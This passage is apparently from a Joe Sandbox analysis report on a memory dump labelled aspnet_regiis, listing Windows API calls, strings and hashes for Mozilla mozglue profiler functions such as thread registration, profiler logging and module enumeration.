                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C7DCD98
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C7DCDAE
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C7DCDC4
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C7DCDDA
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C7DCDF0
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C7DCE06
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C7DCE1C
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C7DCE32
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C7DCE48
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C7DCE5E
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C7DCE74
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C7DCE8A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: strcmp
                                                                                                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                    • API String ID: 1004003707-2809817890
                                                                                                                                                                    APIs
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C7A4801
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7A4817
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7A482D
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A484A
                                                                                                                                                                      • Part of subcall function 6C7CAB3F: EnterCriticalSection.KERNEL32(6C81E370,?,?,6C793527,6C81F6CC,?,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB49
                                                                                                                                                                      • Part of subcall function 6C7CAB3F: LeaveCriticalSection.KERNEL32(6C81E370,?,6C793527,6C81F6CC,?,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CAB7C
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A485F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A487E
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7A488B
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A493A
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C7A4956
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A4960
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7A499A
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A49C6
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A49E9
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    Strings
                                                                                                                                                                    • MOZ_PROFILER_SHUTDOWN, xrefs: 6C7A4A42
                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C7A4812
                                                                                                                                                                    • [I %d/%d] profiler_shutdown, xrefs: 6C7A4A06
                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C7A4828
                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7A47FC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
                                                                                                                                                                    • API String ID: 1340022502-4194431170
                                                                                                                                                                    • Opcode ID: 3871954940e62cea960938981cd52dfcb687942b011a4e7819e1379a30142b19
                                                                                                                                                                    • Instruction ID: 2c34aa34eb5751abe4c1ef7ec38eb0a2ba307e241bfa40a2466a26b605f3de79
                                                                                                                                                                    • Opcode Fuzzy Hash: 3871954940e62cea960938981cd52dfcb687942b011a4e7819e1379a30142b19
                                                                                                                                                                    • Instruction Fuzzy Hash: C2814671A001028FDB20DFA9DA4971A37F5BB5231CF140739E80697F42DB32E856DB9A
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7A4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C7A44B2,6C81E21C,6C81F7F8), ref: 6C7A473E
                                                                                                                                                                      • Part of subcall function 6C7A4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C7A474A
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C7A44BA
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C7A44D2
                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C81F80C,6C79F240,?,?), ref: 6C7A451A
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C7A455C
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C7A4592
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C81F770), ref: 6C7A45A2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C7A45AA
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C7A45BB
                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C81F818,6C79F240,?,?), ref: 6C7A4612
                                                                                                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C7A4636
                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C7A4644
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7A466D
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A469F
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46AB
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46B2
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46B9
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A46C0
                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7A46CD
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C7A46F1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C7A46FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                    • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                    • API String ID: 1702738223-3894940629
                                                                                                                                                                    • Opcode ID: d16f652bb06d67063696c908db9d6767ccf880fe8d7ca4c7f91253fbad8de341
                                                                                                                                                                    • Instruction ID: a5953d5994d2a085fb187792c6a6d2d62bec603b942f0b605ba683c3c492a651
                                                                                                                                                                    • Opcode Fuzzy Hash: d16f652bb06d67063696c908db9d6767ccf880fe8d7ca4c7f91253fbad8de341
                                                                                                                                                                    • Instruction Fuzzy Hash: B361E8B06042459FEB209FA0CE0ABA57BF8EF5630CF048A78E5049BF51D7B19546CF91
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF70E
                                                                                                                                                                    • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C7DF8F9
                                                                                                                                                                      • Part of subcall function 6C7A6390: GetCurrentThreadId.KERNEL32 ref: 6C7A63D0
                                                                                                                                                                      • Part of subcall function 6C7A6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C7A63DF
                                                                                                                                                                      • Part of subcall function 6C7A6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C7A640E
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF93A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF98A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF990
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF994
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF716
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                      • Part of subcall function 6C79B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C79B5E0
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF739
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF746
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF793
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C81385B,00000002,?,?,?,?,?), ref: 6C7DF829
                                                                                                                                                                    • free.MOZGLUE(?,?,00000000,?), ref: 6C7DF84C
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C7DF866
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7DFA0C
                                                                                                                                                                      • Part of subcall function 6C7A5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A5E8C
                                                                                                                                                                      • Part of subcall function 6C7A5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5E9D
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentThreadId.KERNEL32 ref: 6C7A5EAB
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentThreadId.KERNEL32 ref: 6C7A5EB8
                                                                                                                                                                      • Part of subcall function 6C7A5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5ECF
                                                                                                                                                                      • Part of subcall function 6C7A5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C7A5F27
                                                                                                                                                                      • Part of subcall function 6C7A5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C7A5F47
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentProcess.KERNEL32 ref: 6C7A5F53
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentThread.KERNEL32 ref: 6C7A5F5C
                                                                                                                                                                      • Part of subcall function 6C7A5E60: GetCurrentProcess.KERNEL32 ref: 6C7A5F66
                                                                                                                                                                      • Part of subcall function 6C7A5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C7A5F7E
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7DF9C5
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7DF9DA
                                                                                                                                                                    Strings
                                                                                                                                                                    • Thread , xrefs: 6C7DF789
                                                                                                                                                                    • " attempted to re-register as ", xrefs: 6C7DF858
                                                                                                                                                                    • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C7DF9A6
                                                                                                                                                                    • [D %d/%d] profiler_register_thread(%s), xrefs: 6C7DF71F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                    • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                    • API String ID: 882766088-1834255612
                                                                                                                                                                    • Opcode ID: 41585a08435a81ebd4ad462a3fc1d72939fcb939d4a02b86cc4ab90df639e281
                                                                                                                                                                    • Instruction ID: ee7e3895d886c5182a4ebe82f581cf1fa6ed467c43cbc19d2987355ef31dd6f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 41585a08435a81ebd4ad462a3fc1d72939fcb939d4a02b86cc4ab90df639e281
                                                                                                                                                                    • Instruction Fuzzy Hash: 86811771A043019FD720DF24CA48BAABBF5EF85308F45456DE8499BB51EB30E949CBD2
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEE60
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEE6D
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEE92
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C7DEEA5
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C7DEEB4
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7DEEBB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEEC7
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DEECF
                                                                                                                                                                      • Part of subcall function 6C7DDE60: GetCurrentThreadId.KERNEL32 ref: 6C7DDE73
                                                                                                                                                                      • Part of subcall function 6C7DDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C7A4A68), ref: 6C7DDE7B
                                                                                                                                                                      • Part of subcall function 6C7DDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C7A4A68), ref: 6C7DDEB8
                                                                                                                                                                      • Part of subcall function 6C7DDE60: free.MOZGLUE(00000000,?,6C7A4A68), ref: 6C7DDEFE
                                                                                                                                                                      • Part of subcall function 6C7DDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C7DDF38
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEF1E
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEF2B
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEF59
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEFB0
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEFBD
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DEFE1
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEFF8
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF000
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF02F
                                                                                                                                                                      • Part of subcall function 6C7DF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7DF09B
                                                                                                                                                                      • Part of subcall function 6C7DF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C7DF0AC
                                                                                                                                                                      • Part of subcall function 6C7DF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C7DF0BE
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_stop, xrefs: 6C7DEED7
                                                                                                                                                                    • [I %d/%d] profiler_pause, xrefs: 6C7DF008
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                    • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                    • API String ID: 16519850-1833026159
                                                                                                                                                                    • Opcode ID: cf9e687f0fd278a9ecdf8cc44ab07f61bb09f76968cb7da30c8e99fc953db022
                                                                                                                                                                    • Instruction ID: a73215d5030dc057c48ccb8216c52f67a195589160273597b927aaa026e450a6
                                                                                                                                                                    • Opcode Fuzzy Hash: cf9e687f0fd278a9ecdf8cc44ab07f61bb09f76968cb7da30c8e99fc953db022
                                                                                                                                                                    • Instruction Fuzzy Hash: 615148716042179FEB219F66D60E7A67BF8EB6632CF110579E91983F41CB306804C7E2
                                                                                                                                                                    APIs
                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C7A8007
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C7A801D
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C7A802B
                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C7A803D
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C7A808D
                                                                                                                                                                      • Part of subcall function 6C7ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C7ACAA2
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C7A809B
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C7A80B9
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7A80DF
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A80ED
                                                                                                                                                                    • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A80FB
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A810D
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C7A8133
                                                                                                                                                                    • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C7A8149
                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C7A8167
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C7A817C
                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A8199
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                    • String ID: 0>}l
                                                                                                                                                                    • API String ID: 2721933968-554681839
                                                                                                                                                                    • Opcode ID: 0b99740a1239d53b2f59b553611e9c719a70bc6777faefd16bf33f47492199cc
                                                                                                                                                                    • Instruction ID: 1b00cdd2cb636683e568dae2b42b515390ce0086be39b3a6c386f45ee7506b0e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b99740a1239d53b2f59b553611e9c719a70bc6777faefd16bf33f47492199cc
                                                                                                                                                                    • Instruction Fuzzy Hash: AB5194B1E002449BDB10DFA9DD84AEFB7B9EF49264F140239E815E7741E730A905CBA1
                                                                                                                                                                    APIs
